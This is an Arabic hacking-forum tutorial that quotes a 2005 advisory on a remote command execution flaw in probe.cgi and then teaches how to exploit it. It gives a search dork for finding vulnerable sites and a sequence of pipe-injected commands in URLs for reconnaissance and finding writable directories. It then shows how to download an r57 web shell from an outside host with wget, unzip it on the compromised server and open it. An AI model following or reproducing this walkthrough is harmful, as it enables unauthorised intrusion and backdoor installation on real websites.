السلام عليكم ورحمة الله

راح نشرح عمل نوع من الثغرات وهي ما تسمى

(( Remote command exucetion ))

وهي تسمح لك برفع شل او باكدور ,,,,,,الخ

اول حاجه لازم يكون عندك شل مرفوع بموقعك او احد المواقع,,,

طيب خلينا نجيب ثغره ونطبق عنونها كذا

Probe.cgi Remote Command Execution

يعني بملف Probe.cgi فيه ثغره رموت كومند حلو ...طيب خلونا نشوف الاكسبلويت

---------------------------------------------------------
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote Command Execution

o Info:
================
That '''''''''''' is used to open file '.dat'.

o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..

(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isnt checked by anyone matching, so you can open
all file that you want. (35) At this line the '''''''''''' open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the ''''''''l.


o Proof of concept:
================

http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)
--------------------------------------------------------------
لو تقراء باعلى موضح لك الملف ونوع الثغره,,,,,طيب احنا عوزين الاستثمار

استثمارها هنا بالسطر

كود:
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي

cgi-bin<<===مجلد السيقيبين

probe.cgi<<===الملف المصاب

olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============

طيب نبغى نعرف كيف عملها اوكي

اول تسوي بحث بالطريقه هذي

allinurl:probe.cgi

او اي طريقة تحب

لنفرض اننا حصل موقع

WWW.???.com/cgi.bin/probe.cgi?grid=ThaiGrid

كويس اول حاجه نضع

كود:
|id|
بيطلع بالشكل

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|id|

واعطيه انتر بيظهر لك مثلا كذا

كود:
uid=99(www) gid=99(www)
هذا صفتك بالسيرفر

طيب نبغى ننعرفع ممكاننا وين ضع مكان الاي دي

كود:
pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|pwd|
بيطلع معك مثلا

كود:
/home/.???/cgi.bin

طيب نبغى نشوف مسموح لينا نرفع ملف والا لا؟

ضع مكان الاي دي

كود:
which wget
بالشكل,,,,,,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|which wget|
اذا ضهر لك كدا

كود:
/؟؟؟/؟؟؟/wget
وعلامة الاستفاهم متغير يعني اهم شي ويقت تظهر فاعرف انك الوضع زي الفل

يعني مسموح لك ترفع ملف انبسط ياعم

طيب نبغى نعرف التصاريح للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع

لو ترجع احنا قلنا مكاننا وين هنا

كود:
/home/.???/cgi.bin
طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري الرئيسي حلو

نضع مكان الاي دي
كود:
cd /home/.???/;pwd
يعني بيكون بالشكل

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|
الان بيرجعنا الى

كود:
home/.???/
حلو الان نبغى نشوف المجلدات والمفات و التصريحات بالامر

كود:
;ls%20-al
بيطلع كذا,,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|
بتظهر لك ملفات ومجلدات الموقع واما مهم تصريحاتهم

انت ابحث عن الملجلد اللي له التصريح

كود:
drwxrwxrwx
لنفرض انك حصلت امام مجلد الصور او uploads

اولا لازم نخش عليه تعمل

كود:
home/.???/uploads/;pwd
كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|
حلو بيكون وضعك بالشكل

كود:
home/.???/uploads/
يعني داخل مجلد uploads

الان كل معليك رفع الشل طبعا لك شل مرفوع باحد المواقع يعني رابط شيلك

كود:
www.XXX.com/r57''''''''l.zip
وتبغى ترفعه على الموقع المخترقه بالشكل,,,,

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget www.XXX.com/r57''''''''l.zip*|
واعطيه انتر بيظهر لك

كود:
r57''''''''l.zip
طيب نبغى نفك الضغط عنه بالامر unzip

كود:
WWW.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57''''''''l.zip*|
وديلو انتر بيطلع معك

كود:
r57''''''''l.php
والف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط

WWW.???.com/uploads/r57''''''''l.php

عموما ياجماعه الموضع كله انك تعرف كيف تتحرك وترفع ,,, وراح تكون الثغرات اسهل منها ما فيه

والى اللقاء

أخوكم super cristal